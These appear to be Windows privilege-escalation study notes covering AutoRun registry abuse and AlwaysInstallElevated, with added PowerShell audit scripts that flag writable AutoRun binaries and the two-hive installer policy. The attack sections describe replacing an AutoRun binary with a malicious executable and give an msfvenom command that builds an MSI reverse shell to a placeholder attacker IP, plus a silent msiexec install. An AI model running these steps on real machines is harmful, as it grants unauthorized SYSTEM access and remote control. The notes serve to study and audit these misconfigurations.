Registry

AUTORUN:

Your enumeration scripts will list AutoRun programs (winPEAS shows them under "AutoRun applications"). Check whether you have read/write access to those programs. If you do, create a malicious executable with the same name as the AutoRun program and replace the original one. This requires a restart of the machine before the AutoRun gives you a shell, so you only get a shell once the Administrator logs back into his account: the Administrator receives a prompt to run the program and, once he accepts it, you get a reverse shell.
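The "check if those programs have RW access" step, as an added audit script (not part of the original notes and not winPEAS code): it walks the common Run/RunOnce keys, extracts the executable from each value, and reports whether the current user holds a Write, Modify or FullControl allow ACE on the file or on its parent directory. It uses only built-in cmdlets and .NET types; the key list is the usual set and can be extended.

```powershell
# Added audit example (not from the original notes): enumerate Run/RunOnce
# entries and flag targets the current user could overwrite. A writable
# AutoRun binary (or a writable parent directory) is the misconfiguration to fix.
$runKeys = @(
    'HKLM:\Software\Microsoft\Windows\CurrentVersion\Run',
    'HKLM:\Software\Microsoft\Windows\CurrentVersion\RunOnce',
    'HKLM:\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Run',
    'HKCU:\Software\Microsoft\Windows\CurrentVersion\Run',
    'HKCU:\Software\Microsoft\Windows\CurrentVersion\RunOnce'
)

function Get-AutoRunTarget {
    # Pull the executable path out of a Run value such as
    #   "C:\Program Files\Tool\tool.exe" /silent   or   C:\Tool\tool.exe -x
    param([string]$Command)
    if ($Command -match '^\s*"([^"]+)"')  { return $Matches[1] }
    if ($Command -match '^\s*(\S+\.exe)') { return $Matches[1] }
    return $null
}

function Test-WriteAccess {
    # True if any Allow ACE grants Write/Modify/FullControl to the current
    # user or one of its groups. Deny ACEs are ignored, so treat a hit as
    # "needs review" rather than as proof of writability.
    param([string]$Path)
    if (-not (Test-Path -LiteralPath $Path)) { return $false }
    $id   = [System.Security.Principal.WindowsIdentity]::GetCurrent()
    $sids = @($id.User) + @($id.Groups)
    $writeBits = [System.Security.AccessControl.FileSystemRights]::Write -bor
                 [System.Security.AccessControl.FileSystemRights]::Modify -bor
                 [System.Security.AccessControl.FileSystemRights]::FullControl
    foreach ($ace in (Get-Acl -LiteralPath $Path).Access) {
        if ($ace.AccessControlType -ne 'Allow') { continue }
        try {
            $sid = $ace.IdentityReference.Translate([System.Security.Principal.SecurityIdentifier])
        } catch { continue }                       # orphaned or untranslatable identity
        if ($sids -notcontains $sid) { continue }
        if (($ace.FileSystemRights -band $writeBits) -ne 0) { return $true }
    }
    return $false
}

foreach ($key in $runKeys) {
    if (-not (Test-Path -Path $key)) { continue }
    $props = Get-ItemProperty -Path $key
    foreach ($name in $props.PSObject.Properties.Name) {
        if ($name -like 'PS*') { continue }        # skip PSPath, PSParentPath, ...
        $target = Get-AutoRunTarget -Command ([string]$props.$name)
        if (-not $target) { continue }
        [pscustomobject]@{
            Key          = $key
            Name         = $name
            Target       = $target
            FileWritable = Test-WriteAccess -Path $target
            DirWritable  = Test-WriteAccess -Path (Split-Path -Path $target -Parent)
        }
    }
}
```

Any row with FileWritable or DirWritable set to True is worth fixing: the binary should be owned by an administrator and writable only by administrators, and a writable directory matters as much as a writable file because the file can simply be replaced.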

ALWAYS INSTALL ELEVATED:

Windows installers come as MSI packages. For this exploit to work, two registry settings must both be enabled. Check them with:

reg query HKLM\Software\Policies\Microsoft\Windows\Installer

reg query HKCU\Software\Policies\Microsoft\Windows\Installer

Check that AlwaysInstallElevated is set to 1 in both locations; the setting only takes effect when the HKLM and HKCU values are both 1.
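The same two-hive check as an added PowerShell function (not part of the original notes): it reads AlwaysInstallElevated from both policy keys, treats a missing key or value as disabled, and only reports the machine as affected when both hives are 1, which is the condition the reg query commands above are checking by hand.

```powershell
# Added audit example (not from the original notes): AlwaysInstallElevated is
# only effective when the value is 1 in BOTH the machine and the user hive.
# Report each hive plus the net result; the fix is to set both to 0 (policy
# "Always install with elevated privileges" under Windows Components >
# Windows Installer in both Computer and User Configuration).
function Get-AlwaysInstallElevatedState {
    $paths = [ordered]@{
        HKLM = 'HKLM:\Software\Policies\Microsoft\Windows\Installer'
        HKCU = 'HKCU:\Software\Policies\Microsoft\Windows\Installer'
    }
    $state = [ordered]@{}
    foreach ($hive in $paths.Keys) {
        $value = $null                       # $null = key or value absent (default: disabled)
        if (Test-Path -Path $paths[$hive]) {
            $item = Get-ItemProperty -Path $paths[$hive] -Name AlwaysInstallElevated -ErrorAction SilentlyContinue
            if ($item) { $value = [int]$item.AlwaysInstallElevated }
        }
        $state[$hive] = $value
    }
    # Both hives must be 1 for msiexec to install with SYSTEM privileges.
    $state['BothEnabled'] = ($state['HKLM'] -eq 1 -and $state['HKCU'] -eq 1)
    return [pscustomobject]$state
}

Get-AlwaysInstallElevatedState
```

A result with BothEnabled = True is the finding to report; a single hive set to 1 is still worth cleaning up but is not exploitable on its own.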

METHOD 1:

Run PowerUp.ps1 and use the abuse function it reports for this check to add a user or perform some other task.

METHOD 2:

Create a Metasploit reverse shell as an MSI package, transfer it to the machine and run it:

msfvenom -p windows/x64/shell_reverse_tcp LHOST=<attacker_ip> LPORT=1234 -f msi -o shell.msi
# Transfer it to the victim machine and run:
msiexec /quiet /qn /i C:\Temp\shell.msi

METHOD 3:

REGSVC:

winPEAS: Looking if you can modify any service registry
